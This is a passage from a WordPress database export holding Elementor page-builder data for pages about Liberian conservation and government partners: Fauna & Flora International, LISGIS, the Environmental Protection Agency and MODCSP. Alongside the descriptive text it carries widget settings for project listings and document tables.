page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8624,1612,'_dp_original','1610'),(8625,1612,'_edit_last','42'),(8628,1614,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8629,1614,'slide_template','default'),(8631,1614,'_elementor_template_type','wp-post'),(8632,1614,'_elementor_version','2.7.5'),(8633,1614,'_wp_page_template','default'),(8634,1614,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8636,1614,'_dp_original','1612'),(8637,1614,'_edit_last','42'),(8814,1544,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8815,1544,'slide_template','default'),(8817,1544,'_elementor_template_type','wp-post'),(8818,1544,'_elementor_version','2.7.5'),(8819,1544,'_wp_page_template','default'),(8820,1544,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ebf546\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c7b3ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e89fbef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6f5d28\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lisgis\\\",\\\"tag_id\\\":\\\"56\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lisgis\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lisgis\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8821,1544,'_dp_original','923'),(8822,1544,'_edit_last','42'),(8824,1582,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8825,1582,'slide_template','default'),(8827,1582,'_elementor_template_type','wp-post'),(8828,1582,'_elementor_version','2.7.5'),(8829,1582,'_wp_page_template','default'),(8830,1582,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8831,1582,'_dp_original','1544'),(8832,1582,'_edit_last','38'),(8834,1584,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8835,1584,'slide_template','default'),(8837,1584,'_elementor_template_type','wp-post'),(8838,1584,'_elementor_version','2.7.5'),(8839,1584,'_wp_page_template','default'),(8840,1584,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 